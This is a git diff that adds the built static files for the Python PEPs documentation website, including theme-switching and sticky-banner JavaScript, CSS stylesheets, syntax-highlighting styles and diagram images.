diff --git a/.buildinfo b/.buildinfo new file mode 100644 index 00000000000..7285aa4cdf6 --- /dev/null +++ b/.buildinfo @@ -0,0 +1,4 @@ +# Sphinx build info version 1 +# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done. +config: a2c65ff4b368e636fe453f07402e58f4 +tags: d77d1c0d9ca2f4c8421862c7c5a0d620 diff --git a/.nojekyll b/.nojekyll new file mode 100644 index 00000000000..e69de29bb2d diff --git a/CNAME b/CNAME new file mode 100644 index 00000000000..581dc8addd2 --- /dev/null +++ b/CNAME @@ -0,0 +1 @@ +peps.python.org \ No newline at end of file diff --git a/_images/appendix-dl-by-installer.png b/_images/appendix-dl-by-installer.png new file mode 100644 index 00000000000..7d8cd856898 Binary files /dev/null and b/_images/appendix-dl-by-installer.png differ diff --git a/_images/appendix-dl-by-pip-version.png b/_images/appendix-dl-by-pip-version.png new file mode 100644 index 00000000000..2b23afb9b01 Binary files /dev/null and b/_images/appendix-dl-by-pip-version.png differ diff --git a/_images/circuit-breaking-protocol.svg b/_images/circuit-breaking-protocol.svg new file mode 100644 index 00000000000..39086bb0328 --- /dev/null +++ b/_images/circuit-breaking-protocol.svg @@ -0,0 +1,2 @@ + +
x if breaker else y
x <b>if</b> breaker <b>else</b> y<br>
True
True
False
False
bool(breaker)
bool(breaker)
breaker.__then__(x)
breaker.__then__(x)
breaker.__else__(y)
breaker.__else__(y)
When "x is breaker",
this is a short-circuited

"breaker else z"
[Not supported by viewer]
When "y is breaker",
this is a short-circuited

"x if breaker"
[Not supported by viewer]
\ No newline at end of file diff --git a/_images/pep-0458-1.png b/_images/pep-0458-1.png new file mode 100644 index 00000000000..d455a22ac8f Binary files /dev/null and b/_images/pep-0458-1.png differ diff --git a/_images/pep-0480-1.png b/_images/pep-0480-1.png new file mode 100644 index 00000000000..fe486abfd01 Binary files /dev/null and b/_images/pep-0480-1.png differ diff --git a/_images/pep-0495-daylightsavings.png b/_images/pep-0495-daylightsavings.png new file mode 100644 index 00000000000..913d67de52a Binary files /dev/null and b/_images/pep-0495-daylightsavings.png differ diff --git a/_images/pep-0495-fold.svg b/_images/pep-0495-fold.svg new file mode 100644 index 00000000000..2dfde2d8a17 --- /dev/null +++ b/_images/pep-0495-fold.svg @@ -0,0 +1,427 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + image/svg+xml + + + + + + + + UTC local + + + + + + + + + t + u0 + u1 + + + + + Fold + + + diff --git a/_images/pep-0495-gap.svg b/_images/pep-0495-gap.svg new file mode 100644 index 00000000000..090213a307a --- /dev/null +++ b/_images/pep-0495-gap.svg @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/_images/pep-0525-1.png b/_images/pep-0525-1.png new file mode 100644 index 00000000000..356386fbb2a Binary files /dev/null and b/_images/pep-0525-1.png differ diff --git a/_images/pep-0550-hamt_vs_dict-v2.png b/_images/pep-0550-hamt_vs_dict-v2.png new file mode 100644 index 00000000000..7518e597135 Binary files /dev/null and b/_images/pep-0550-hamt_vs_dict-v2.png differ diff --git a/_images/pep-0550-lookup_hamt.png b/_images/pep-0550-lookup_hamt.png new file mode 100644 index 00000000000..adbe492e51e Binary files /dev/null and b/_images/pep-0550-lookup_hamt.png differ diff --git a/_images/pep-0602-example-release-calendar.png b/_images/pep-0602-example-release-calendar.png new file mode 100644 index 00000000000..fdbf1a0f53f Binary files /dev/null and b/_images/pep-0602-example-release-calendar.png differ diff --git a/_images/pep-0602-overlapping-support-matrix.png b/_images/pep-0602-overlapping-support-matrix.png new file mode 100644 index 00000000000..4620a10deca Binary files /dev/null and b/_images/pep-0602-overlapping-support-matrix.png differ diff --git a/_images/pep-0603-hamt_vs_dict.png b/_images/pep-0603-hamt_vs_dict.png new file mode 100644 index 00000000000..eb1d4bc6d83 Binary files /dev/null and b/_images/pep-0603-hamt_vs_dict.png differ diff --git a/_images/pep-0603-lookup_hamt.png b/_images/pep-0603-lookup_hamt.png new file mode 100644 index 00000000000..adbe492e51e Binary files /dev/null and b/_images/pep-0603-lookup_hamt.png differ diff --git a/_images/pep-0605-example-release-calendar.png b/_images/pep-0605-example-release-calendar.png new file mode 100644 index 00000000000..f7998d240a0 Binary files /dev/null and b/_images/pep-0605-example-release-calendar.png differ diff --git a/_images/pep-0605-overlapping-support-matrix.png b/_images/pep-0605-overlapping-support-matrix.png new file mode 100644 index 00000000000..f01c2c69a75 Binary files /dev/null and b/_images/pep-0605-overlapping-support-matrix.png differ diff --git a/_images/pep-0732-concentric.drawio.svg b/_images/pep-0732-concentric.drawio.svg new file mode 100644 index 00000000000..02677c5ee5c --- /dev/null +++ b/_images/pep-0732-concentric.drawio.svg @@ -0,0 +1,4 @@ + + + +
3   
3   
2   
2   
1
1
1
1
2
2
3
3
World
includes readers of the documentation
World...
Documentation Working Group
volunteers who contribute to the docs
Documentation Working Group...
Documentation Editoral Board
trusted group
Documentation Editoral Board...
Text is not SVG - cannot display
\ No newline at end of file diff --git a/_images/pep-3147-1.png b/_images/pep-3147-1.png new file mode 100644 index 00000000000..8c692667aa2 Binary files /dev/null and b/_images/pep-3147-1.png differ diff --git a/_images/pep-789-example-no-yield.png b/_images/pep-789-example-no-yield.png new file mode 100644 index 00000000000..b27a9350c07 Binary files /dev/null and b/_images/pep-789-example-no-yield.png differ diff --git a/_images/pep-789-example-yield-allowed.png b/_images/pep-789-example-yield-allowed.png new file mode 100644 index 00000000000..173926c4361 Binary files /dev/null and b/_images/pep-789-example-yield-allowed.png differ diff --git a/_images/pep-789-example-yield-errors.png b/_images/pep-789-example-yield-errors.png new file mode 100644 index 00000000000..98bbbe8d6d0 Binary files /dev/null and b/_images/pep-789-example-yield-errors.png differ diff --git a/_images/process_flow.svg b/_images/process_flow.svg new file mode 100644 index 00000000000..2f9a3b95004 --- /dev/null +++ b/_images/process_flow.svg @@ -0,0 +1,580 @@ + + + + + + image/svg+xml + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Provisional + + + + Draft + + + + Withdrawn + + + + Rejected + + + + Final + + + + Accepted + + + + Deferred + + + + Active + + + + Superseded + + + + + + + + + + + + + diff --git a/_static/colour_scheme.js b/_static/colour_scheme.js new file mode 100644 index 00000000000..ee94274d24b --- /dev/null +++ b/_static/colour_scheme.js @@ -0,0 +1,35 @@ +// Handle setting and changing the site's color scheme (light/dark) + +"use strict"; + +const prefersDark = window.matchMedia("(prefers-color-scheme: dark)") + +const getColourScheme = () => document.documentElement.dataset.colour_scheme +const setColourScheme = (colourScheme = getColourScheme()) => { + document.documentElement.dataset.colour_scheme = colourScheme + localStorage.setItem("colour_scheme", colourScheme) + setPygments(colourScheme) +} + +// Map system theme to a cycle of steps +const cycles = { + dark: ["auto", "light", "dark"], // auto (dark) → light → dark + light: ["auto", "dark", "light"], // auto (light) → dark → light +} + +const nextColourScheme = (colourScheme = getColourScheme()) => { + const cycle = cycles[prefersDark.matches ? "dark" : "light"] + return cycle[(cycle.indexOf(colourScheme) + 1) % cycle.length] +} + +const setPygments = (colourScheme = getColourScheme()) => { + const pygmentsDark = document.getElementById("pyg-dark") + const pygmentsLight = document.getElementById("pyg-light") + pygmentsDark.disabled = colourScheme === "light" + pygmentsLight.disabled = colourScheme === "dark" + pygmentsDark.media = colourScheme === "auto" ? "(prefers-color-scheme: dark)" : "" + pygmentsLight.media = colourScheme === "auto" ? "(prefers-color-scheme: light)" : "" +} + +// Update Pygments state (the page theme is initialised inline, see page.html) +document.addEventListener("DOMContentLoaded", () => setColourScheme()) diff --git a/_static/mq.css b/_static/mq.css new file mode 100644 index 00000000000..2609a959ebd --- /dev/null +++ b/_static/mq.css @@ -0,0 +1,165 @@ +@charset "UTF-8"; + +/* Media Queries */ + +/* Reduce padding & margins for smaller screens */ +@media (max-width: 40em) { + section#pep-page-section { + padding: 1rem; + } + section#pep-page-section > header > h1 { + padding-right: 0; + border-right: none; + } + ul.breadcrumbs { + padding: 0 0 .5rem; + } + nav#pep-sidebar { + display: none; + } + pre { + font-size: 0.8175rem; + } + table th, + table td { + padding: 0 0.1rem; + } +} + +@media (min-width: 40em) { + section#pep-page-section { + display: table; + margin: 0 auto; + max-width: 75em; + padding: 0.5rem 1rem 0; + width: 100%; + } + section#pep-page-section > article { + max-width: 37em; + width: 74%; + float: right; + margin-right: 0; + font-size: 1rem; + } + nav#pep-sidebar { + width: 24%; + float: left; + margin-right: 2%; + } + /* Make less prominent when sidebar ToC is available */ + details > summary { + font-size: 1rem; + width: max-content; + } +} +@media (min-width: 60em) { + section#pep-page-section > article { + max-width: 56em; + padding-left: 3.2%; + padding-right: 3.2%; + } +} + +@media print { + *, + *:before, + *:after { + color: #000 !important; + } + body { + font-size: 10pt; + line-height: 1.67; + } + *[role="main"] a[href]:after { + content: " (" attr(href) ")"; + font-size: .75rem; + } + pre, + blockquote { + page-break-inside: avoid; + } + thead { + display: table-header-group; + } + tr, + img { + page-break-inside: avoid; + } + img { + max-width: 100% !important; + } + /* Page margins according to DIN 5008, leaves space for punched holes. */ + @page { + margin-top: 2cm; + margin-bottom: 2cm; + margin-left: 2.5cm; + margin-right: 2.5cm; + } + p, + h2, + h3 { + orphans: 3; + widows: 3; + } + h1, + h2, + h3 { + page-break-after: avoid; + } + h1 { + font-size: 18pt; + font-weight: bold; + text-align: center; + } + h2, details > summary { + font-size: 15pt; + font-weight: normal; + } + h3 { + font-size: 13pt; + font-weight: normal; + } + h4 { + font-size: 10pt; + font-weight: 600; + } + a, abbr { + text-decoration: none; + } + + details { + display: none; + } + details[open] { + display: block; + } + + h1.page-title:first-child { + margin-top: 0; + } + + section#pep-page-section { + display: flex; + justify-content: center; + padding: 0; + margin: 0 auto; + } + + section#pep-page-section > header, + nav#pep-sidebar { + display: none; + } + + section#pep-page-section > article { + float: none; + max-width: 17.5cm; + width: auto; + margin: 0; + padding: 0; + } + + /* This blocks a small portion on each page. */ + readthedocs-flyout { + display: none; + } +} diff --git a/_static/og-image.png b/_static/og-image.png new file mode 100644 index 00000000000..0e80751e740 Binary files /dev/null and b/_static/og-image.png differ diff --git a/_static/py.png b/_static/py.png new file mode 100644 index 00000000000..93e4a02c3d3 Binary files /dev/null and b/_static/py.png differ diff --git a/_static/pygments.css b/_static/pygments.css new file mode 100644 index 00000000000..6110e9f1add --- /dev/null +++ b/_static/pygments.css @@ -0,0 +1,84 @@ +pre { line-height: 125%; } +td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; } +span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; } +td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +.highlight .hll { background-color: #ffffcc } +.highlight { background: #f8f8f8; } +.highlight .c { color: #8f5902; font-style: italic } /* Comment */ +.highlight .err { color: #a40000; border: 1px solid #ef2929 } /* Error */ +.highlight .g { color: #000000 } /* Generic */ +.highlight .k { color: #204a87; font-weight: bold } /* Keyword */ +.highlight .l { color: #000000 } /* Literal */ +.highlight .n { color: #000000 } /* Name */ +.highlight .o { color: #ce5c00; font-weight: bold } /* Operator */ +.highlight .x { color: #000000 } /* Other */ +.highlight .p { color: #000000; font-weight: bold } /* Punctuation */ +.highlight .ch { color: #8f5902; font-style: italic } /* Comment.Hashbang */ +.highlight .cm { color: #8f5902; font-style: italic } /* Comment.Multiline */ +.highlight .cp { color: #8f5902; font-style: italic } /* Comment.Preproc */ +.highlight .cpf { color: #8f5902; font-style: italic } /* Comment.PreprocFile */ +.highlight .c1 { color: #8f5902; font-style: italic } /* Comment.Single */ +.highlight .cs { color: #8f5902; font-style: italic } /* Comment.Special */ +.highlight .gd { color: #a40000 } /* Generic.Deleted */ +.highlight .ge { color: #000000; font-style: italic } /* Generic.Emph */ +.highlight .ges { color: #000000; font-weight: bold; font-style: italic } /* Generic.EmphStrong */ +.highlight .gr { color: #ef2929 } /* Generic.Error */ +.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */ +.highlight .gi { color: #00A000 } /* Generic.Inserted */ +.highlight .go { color: #000000; font-style: italic } /* Generic.Output */ +.highlight .gp { color: #8f5902 } /* Generic.Prompt */ +.highlight .gs { color: #000000; font-weight: bold } /* Generic.Strong */ +.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ +.highlight .gt { color: #a40000; font-weight: bold } /* Generic.Traceback */ +.highlight .kc { color: #204a87; font-weight: bold } /* Keyword.Constant */ +.highlight .kd { color: #204a87; font-weight: bold } /* Keyword.Declaration */ +.highlight .kn { color: #204a87; font-weight: bold } /* Keyword.Namespace */ +.highlight .kp { color: #204a87; font-weight: bold } /* Keyword.Pseudo */ +.highlight .kr { color: #204a87; font-weight: bold } /* Keyword.Reserved */ +.highlight .kt { color: #204a87; font-weight: bold } /* Keyword.Type */ +.highlight .ld { color: #000000 } /* Literal.Date */ +.highlight .m { color: #0000cf; font-weight: bold } /* Literal.Number */ +.highlight .s { color: #4e9a06 } /* Literal.String */ +.highlight .na { color: #c4a000 } /* Name.Attribute */ +.highlight .nb { color: #204a87 } /* Name.Builtin */ +.highlight .nc { color: #000000 } /* Name.Class */ +.highlight .no { color: #000000 } /* Name.Constant */ +.highlight .nd { color: #5c35cc; font-weight: bold } /* Name.Decorator */ +.highlight .ni { color: #ce5c00 } /* Name.Entity */ +.highlight .ne { color: #cc0000; font-weight: bold } /* Name.Exception */ +.highlight .nf { color: #000000 } /* Name.Function */ +.highlight .nl { color: #f57900 } /* Name.Label */ +.highlight .nn { color: #000000 } /* Name.Namespace */ +.highlight .nx { color: #000000 } /* Name.Other */ +.highlight .py { color: #000000 } /* Name.Property */ +.highlight .nt { color: #204a87; font-weight: bold } /* Name.Tag */ +.highlight .nv { color: #000000 } /* Name.Variable */ +.highlight .ow { color: #204a87; font-weight: bold } /* Operator.Word */ +.highlight .pm { color: #000000; font-weight: bold } /* Punctuation.Marker */ +.highlight .w { color: #f8f8f8 } /* Text.Whitespace */ +.highlight .mb { color: #0000cf; font-weight: bold } /* Literal.Number.Bin */ +.highlight .mf { color: #0000cf; font-weight: bold } /* Literal.Number.Float */ +.highlight .mh { color: #0000cf; font-weight: bold } /* Literal.Number.Hex */ +.highlight .mi { color: #0000cf; font-weight: bold } /* Literal.Number.Integer */ +.highlight .mo { color: #0000cf; font-weight: bold } /* Literal.Number.Oct */ +.highlight .sa { color: #4e9a06 } /* Literal.String.Affix */ +.highlight .sb { color: #4e9a06 } /* Literal.String.Backtick */ +.highlight .sc { color: #4e9a06 } /* Literal.String.Char */ +.highlight .dl { color: #4e9a06 } /* Literal.String.Delimiter */ +.highlight .sd { color: #8f5902; font-style: italic } /* Literal.String.Doc */ +.highlight .s2 { color: #4e9a06 } /* Literal.String.Double */ +.highlight .se { color: #4e9a06 } /* Literal.String.Escape */ +.highlight .sh { color: #4e9a06 } /* Literal.String.Heredoc */ +.highlight .si { color: #4e9a06 } /* Literal.String.Interpol */ +.highlight .sx { color: #4e9a06 } /* Literal.String.Other */ +.highlight .sr { color: #4e9a06 } /* Literal.String.Regex */ +.highlight .s1 { color: #4e9a06 } /* Literal.String.Single */ +.highlight .ss { color: #4e9a06 } /* Literal.String.Symbol */ +.highlight .bp { color: #3465a4 } /* Name.Builtin.Pseudo */ +.highlight .fm { color: #000000 } /* Name.Function.Magic */ +.highlight .vc { color: #000000 } /* Name.Variable.Class */ +.highlight .vg { color: #000000 } /* Name.Variable.Global */ +.highlight .vi { color: #000000 } /* Name.Variable.Instance */ +.highlight .vm { color: #000000 } /* Name.Variable.Magic */ +.highlight .il { color: #0000cf; font-weight: bold } /* Literal.Number.Integer.Long */ \ No newline at end of file diff --git a/_static/pygments_dark.css b/_static/pygments_dark.css new file mode 100644 index 00000000000..d8ba6bf2ac3 --- /dev/null +++ b/_static/pygments_dark.css @@ -0,0 +1,85 @@ +pre { line-height: 125%; } +td.linenos .normal { color: #aaaaaa; background-color: transparent; padding-left: 5px; padding-right: 5px; } +span.linenos { color: #aaaaaa; background-color: transparent; padding-left: 5px; padding-right: 5px; } +td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +.highlight .hll { background-color: #404040 } +.highlight { background: #202020; color: #d0d0d0 } +.highlight .c { color: #ababab; font-style: italic } /* Comment */ +.highlight .err { color: #a61717; background-color: #e3d2d2 } /* Error */ +.highlight .esc { color: #d0d0d0 } /* Escape */ +.highlight .g { color: #d0d0d0 } /* Generic */ +.highlight .k { color: #6ebf26; font-weight: bold } /* Keyword */ +.highlight .l { color: #d0d0d0 } /* Literal */ +.highlight .n { color: #d0d0d0 } /* Name */ +.highlight .o { color: #d0d0d0 } /* Operator */ +.highlight .x { color: #d0d0d0 } /* Other */ +.highlight .p { color: #d0d0d0 } /* Punctuation */ +.highlight .ch { color: #ababab; font-style: italic } /* Comment.Hashbang */ +.highlight .cm { color: #ababab; font-style: italic } /* Comment.Multiline */ +.highlight .cp { color: #ff3a3a; font-weight: bold } /* Comment.Preproc */ +.highlight .cpf { color: #ababab; font-style: italic } /* Comment.PreprocFile */ +.highlight .c1 { color: #ababab; font-style: italic } /* Comment.Single */ +.highlight .cs { color: #e50808; font-weight: bold; background-color: #520000 } /* Comment.Special */ +.highlight .gd { color: #ff3a3a } /* Generic.Deleted */ +.highlight .ge { color: #d0d0d0; font-style: italic } /* Generic.Emph */ +.highlight .ges { color: #d0d0d0; font-weight: bold; font-style: italic } /* Generic.EmphStrong */ +.highlight .gr { color: #ff3a3a } /* Generic.Error */ +.highlight .gh { color: #ffffff; font-weight: bold } /* Generic.Heading */ +.highlight .gi { color: #589819 } /* Generic.Inserted */ +.highlight .go { color: #cccccc } /* Generic.Output */ +.highlight .gp { color: #aaaaaa } /* Generic.Prompt */ +.highlight .gs { color: #d0d0d0; font-weight: bold } /* Generic.Strong */ +.highlight .gu { color: #ffffff; text-decoration: underline } /* Generic.Subheading */ +.highlight .gt { color: #ff3a3a } /* Generic.Traceback */ +.highlight .kc { color: #6ebf26; font-weight: bold } /* Keyword.Constant */ +.highlight .kd { color: #6ebf26; font-weight: bold } /* Keyword.Declaration */ +.highlight .kn { color: #6ebf26; font-weight: bold } /* Keyword.Namespace */ +.highlight .kp { color: #6ebf26 } /* Keyword.Pseudo */ +.highlight .kr { color: #6ebf26; font-weight: bold } /* Keyword.Reserved */ +.highlight .kt { color: #6ebf26; font-weight: bold } /* Keyword.Type */ +.highlight .ld { color: #d0d0d0 } /* Literal.Date */ +.highlight .m { color: #51b2fd } /* Literal.Number */ +.highlight .s { color: #ed9d13 } /* Literal.String */ +.highlight .na { color: #bbbbbb } /* Name.Attribute */ +.highlight .nb { color: #2fbccd } /* Name.Builtin */ +.highlight .nc { color: #71adff; text-decoration: underline } /* Name.Class */ +.highlight .no { color: #40ffff } /* Name.Constant */ +.highlight .nd { color: #ffa500 } /* Name.Decorator */ +.highlight .ni { color: #d0d0d0 } /* Name.Entity */ +.highlight .ne { color: #bbbbbb } /* Name.Exception */ +.highlight .nf { color: #71adff } /* Name.Function */ +.highlight .nl { color: #d0d0d0 } /* Name.Label */ +.highlight .nn { color: #71adff; text-decoration: underline } /* Name.Namespace */ +.highlight .nx { color: #d0d0d0 } /* Name.Other */ +.highlight .py { color: #d0d0d0 } /* Name.Property */ +.highlight .nt { color: #6ebf26; font-weight: bold } /* Name.Tag */ +.highlight .nv { color: #40ffff } /* Name.Variable */ +.highlight .ow { color: #6ebf26; font-weight: bold } /* Operator.Word */ +.highlight .pm { color: #d0d0d0 } /* Punctuation.Marker */ +.highlight .w { color: #666666 } /* Text.Whitespace */ +.highlight .mb { color: #51b2fd } /* Literal.Number.Bin */ +.highlight .mf { color: #51b2fd } /* Literal.Number.Float */ +.highlight .mh { color: #51b2fd } /* Literal.Number.Hex */ +.highlight .mi { color: #51b2fd } /* Literal.Number.Integer */ +.highlight .mo { color: #51b2fd } /* Literal.Number.Oct */ +.highlight .sa { color: #ed9d13 } /* Literal.String.Affix */ +.highlight .sb { color: #ed9d13 } /* Literal.String.Backtick */ +.highlight .sc { color: #ed9d13 } /* Literal.String.Char */ +.highlight .dl { color: #ed9d13 } /* Literal.String.Delimiter */ +.highlight .sd { color: #ed9d13 } /* Literal.String.Doc */ +.highlight .s2 { color: #ed9d13 } /* Literal.String.Double */ +.highlight .se { color: #ed9d13 } /* Literal.String.Escape */ +.highlight .sh { color: #ed9d13 } /* Literal.String.Heredoc */ +.highlight .si { color: #ed9d13 } /* Literal.String.Interpol */ +.highlight .sx { color: #ffa500 } /* Literal.String.Other */ +.highlight .sr { color: #ed9d13 } /* Literal.String.Regex */ +.highlight .s1 { color: #ed9d13 } /* Literal.String.Single */ +.highlight .ss { color: #ed9d13 } /* Literal.String.Symbol */ +.highlight .bp { color: #2fbccd } /* Name.Builtin.Pseudo */ +.highlight .fm { color: #71adff } /* Name.Function.Magic */ +.highlight .vc { color: #40ffff } /* Name.Variable.Class */ +.highlight .vg { color: #40ffff } /* Name.Variable.Global */ +.highlight .vi { color: #40ffff } /* Name.Variable.Instance */ +.highlight .vm { color: #40ffff } /* Name.Variable.Magic */ +.highlight .il { color: #51b2fd } /* Literal.Number.Integer.Long */ \ No newline at end of file diff --git a/_static/sticky_banner.js b/_static/sticky_banner.js new file mode 100644 index 00000000000..e20f62d2d33 --- /dev/null +++ b/_static/sticky_banner.js @@ -0,0 +1,38 @@ +"use strict"; + +// Inject a style element into the document head that adds scroll-margin-top to +// all elements with an id attribute. This is used to offset the scroll position +// when clicking on a link to an element with an id attribute. The offset is +// equal to the height of the sticky banner. +document.addEventListener("DOMContentLoaded", () => { + const stickyBanners = document.getElementsByClassName("sticky-banner"); + if (!stickyBanners.length) { + return; + } + + const stickyBanner = stickyBanners[0]; + const node = document.createElement("style"); + node.id = "sticky-banner-style"; + document.head.appendChild(node); + + function adjustBannerMargin() { + const text = document.createTextNode( + ":target { scroll-margin-top: " + stickyBanner.offsetHeight + "px; }" + ); + node.replaceChildren(text); + } + + const closeButton = document.querySelector('.close-button'); + if (closeButton) { + closeButton.addEventListener('click', () => { + const stickyBanner = document.querySelector('.sticky-banner'); + if (stickyBanner) { + stickyBanner.style.display = 'none'; + } + }); + } + + adjustBannerMargin(); + document.addEventListener("resize", adjustBannerMargin); + document.addEventListener("load", adjustBannerMargin); +}); diff --git a/_static/style.css b/_static/style.css new file mode 100644 index 00000000000..37323c27794 --- /dev/null +++ b/_static/style.css @@ -0,0 +1,475 @@ +@charset "UTF-8"; + +/* Styles for PEPs */ + +/* + * `initial` works like undefined variables, so `var(initial, x)` will resolve to `x`. + * A space means an empty value, so `var( , x) y` will resolve to `y`. + */ +@media (prefers-color-scheme: dark) { + :root { + --light: ; + --dark: initial; + } +} + +@media (prefers-color-scheme: light) { + :root { + --dark: ; + --light: initial; + } +} + +:root[data-colour_scheme="dark"] { + --light: ; + --dark: initial; +} + +:root[data-colour_scheme="light"] { + --dark: ; + --light: initial; +} + +/* Set master colours */ +:root { + --colour-background: var(--light, white) var(--dark, #111); + --colour-background-accent-strong: var(--light, #ccc) var(--dark, #444); + --colour-background-accent-medium: var(--light, #ddd) var(--dark, #333); + --colour-background-accent-light: var(--light, #eee) var(--dark, #222); + --colour-text: var(--light, #333) var(--dark, #ccc); + --colour-text-strong: var(--light, #222) var(--dark, #ddd); + --colour-links: var(--light, #069) var(--dark, #8bf); + --colour-links-light: var(--light, #057) var(--dark, #acf); + --colour-scrollbar: var(--light, #ccc) var(--dark, #333); + --colour-rule-strong: var(--light, #888) var(--dark, #777); + --colour-rule-light: var(--light, #ddd) var(--dark, #222); + --colour-inline-code-bg: var(--light, #eee) var(--dark, #333); + --colour-inline-code-text: var(--light, #222) var(--dark, #ccc); + --colour-error: var(--light, #faa) var(--dark, #800); + --colour-warning: var(--light, #fca) var(--dark, #840); + --colour-caution: var(--light, #ffa) var(--dark, #550); + --colour-attention: var(--light, #bdf) var(--dark, #045); + --colour-tip: var(--light, #bfc) var(--dark, #041); +} + +img.invert-in-dark-mode { + filter: var(--dark, invert(1) hue-rotate(.5turn)); +} + +/* Set master rules */ +* {box-sizing: border-box} +:root {color-scheme: light dark} +html { + overflow-y: scroll; + line-height: 1.5; + font-size: 1rem; + font-family: -apple-system, BlinkMacSystemFont, avenir next, avenir, segoe ui, helvetica neue, helvetica, Cantarell, Ubuntu, roboto, noto, arial, sans-serif; +} +body { + margin: 0; + color: var(--colour-text); + background-color: var(--colour-background); +} +section#pep-page-section { + padding: 0.25rem; +} + +/* This is likely very close to the browser default, but we make it a variable + * so it can be used in other rules. */ +:root { + --paragraph-margin-vertical: 1em; +} +p { + margin: var(--paragraph-margin-vertical) 0; +} + +/* Header rules */ +h1 { + font-size: 2rem; + font-weight: bold; +} +h2 { + font-size: 1.6rem; + font-weight: bold; +} +h3 { + font-size: 1.4rem; + font-weight: normal; +} +h4 { + font-size: 1.2rem; + font-weight: normal; +} +h5, +h6 { + font-size: 1rem; + font-weight: bold; +} + +/* Anchor link rules */ +a, +a:active, +a:visited { + color: var(--colour-links); + display: inline; + overflow-wrap: anywhere; + text-decoration-color: var(--colour-background-accent-strong); +} +a:hover, +a:focus { + text-decoration-color: var(--colour-rule-strong); +} + +/* Blockquote rules */ +blockquote { + font-style: italic; + border-left: 1px solid var(--colour-rule-strong); + padding: .5rem 1rem; +} +blockquote em { + font-style: normal; +} + +cite { + font-style: italic; +} + +/* Code rules (code literals and Pygments highlighting blocks) */ +code, +pre { + font-family: Menlo, Consolas, Monaco, Liberation Mono, Lucida Console, monospace; + font-size: 0.875rem; + -webkit-hyphens: none; + hyphens: none; +} +code { + overflow-wrap: anywhere; +} +code.literal { + background-color: var(--colour-inline-code-bg); + color: var(--colour-inline-code-text); + font-size: .8em; + padding: 1px 2px 1px; +} +pre { + overflow-x: auto; + padding: .5rem .75rem; + white-space: pre; +} + +.good pre { + border-left: 3px solid rgba(74, 182, 93, 1); +} +.bad pre { + border-left: 3px solid rgb(244, 76, 78); +} +.maybe pre { + border-left: 3px solid rgb(244, 227, 76); +} + +/* Contents rules */ +details > summary { + cursor: pointer; + font-size: 1.6rem; + font-weight: bold; + margin-bottom: 1em; +} +details > summary:hover { + text-decoration: underline; +} + +/* Definition list rules */ +dl dt { + font-weight: bold; +} +dl dd { + margin-bottom: 0.5rem; +} + +/* Horizontal rule rule */ +hr { + border: 0; + border-top: 1px solid var(--colour-rule-light); +} +/* Image rules */ +img { + max-width: 100%; +} +a img { + display: block; + margin: 0 auto; +} + +/* List rules */ +ol.loweralpha {list-style: lower-alpha} +ol.upperalpha {list-style: upper-alpha} +ol.lowerroman {list-style: lower-roman} +ol.upperroman {list-style: upper-roman} + +/* We can't express this as a single rule using `not(.simple)`, because when a + * simple list is nested inside another simple list, the inner list is not given + * a class. So instead we use two rules, one more specific than the other. */ +#pep-content ol li, +#pep-content ul li { + margin: var(--paragraph-margin-vertical) 0; +} +#pep-content ol.simple li, +#pep-content ul.simple li { + margin: 0 0; +} + +/* Maths rules */ +sub, +sup { + font-size: .75em; + line-height: 0; + position: relative; + vertical-align: baseline; +} +sup {top: -0.5em} +sub {bottom: -0.25em} + +/* Table rules */ +div.table-wrapper { + overflow-x: auto; +} +table { + width: 100%; + border-collapse: collapse; + border: 1px solid var(--colour-background-accent-strong); +} +table caption { + margin: 1rem 0 .75rem; +} +table thead tr { + background-color: var(--colour-background-accent-medium); + color: var(--colour-text-strong); +} +table tbody tr { + border-top: 1px solid var(--colour-background-accent-strong); +} +table th, +table td { + text-align: left; + padding: 0.25rem 0.5rem 0.2rem; +} +table.pep-zero-table tr td:nth-child(1), +table.pep-zero-table tr td:nth-child(2) { + white-space: nowrap; +} +table th + th, +table td + td { + border-left: 1px solid var(--colour-background-accent-strong); +} +/* Common column widths for PEP status tables */ +table.pep-zero-table tr td:nth-child(1) { + width: 5%; +} +table.pep-zero-table tr td:nth-child(2) { + width: 7%; +} +table.pep-zero-table tr td:nth-child(3), +table.pep-zero-table tr td:nth-child(4){ + width: 41%; +} +table.pep-zero-table tr td:nth-child(5) { + width: 6%; +} +/* Authors & Sponsors table */ +#authors-owners table td, +#authors-owners table th { + width: 50%; +} + +/* Numerical index */ +article:has(> section#numerical-index) { + float: unset !important; + width: 90% !important; + max-width: 90% !important; +} + +/* Breadcrumbs rules */ +section#pep-page-section > header { + border-bottom: 1px solid var(--colour-rule-light); +} +section#pep-page-section > header > h1 { + font-size: 1.1rem; + margin: 0; + display: inline-block; + padding-right: .6rem; + border-right: 1px solid var(--colour-rule-strong); +} +ul.breadcrumbs { + margin: 0; + padding: .5rem 0 .5rem .4rem; + list-style: none; + display: inline-block; +} +ul.breadcrumbs li { + display: inline; +} +ul.breadcrumbs a { + text-decoration: none; +} + +/* Dark mode toggle rules */ +#colour-scheme-cycler { + background: transparent; + border: none; + padding: 0; + cursor: pointer; + width: 1.2rem; + height: 1.2rem; + float: right; + transform: translate(0, 50%); +} +#colour-scheme-cycler svg { + color: var(--colour-rule-strong); + height: 1.2rem; + width: 1.2rem; + display: none; +} +:root[data-colour_scheme="auto"] #colour-scheme-cycler svg.colour-scheme-icon-when-auto {display: initial} +:root[data-colour_scheme="dark"] #colour-scheme-cycler svg.colour-scheme-icon-when-dark {display: initial} +:root[data-colour_scheme="light"] #colour-scheme-cycler svg.colour-scheme-icon-when-light {display: initial} + +/* Admonitions rules */ +div.admonition { + background-color: var(--colour-background-accent-medium); + margin-bottom: 1rem; + margin-top: 1rem; + padding: 0.5rem 0.75rem; +} +div.admonition a { + color: var(--colour-links-light); +} + 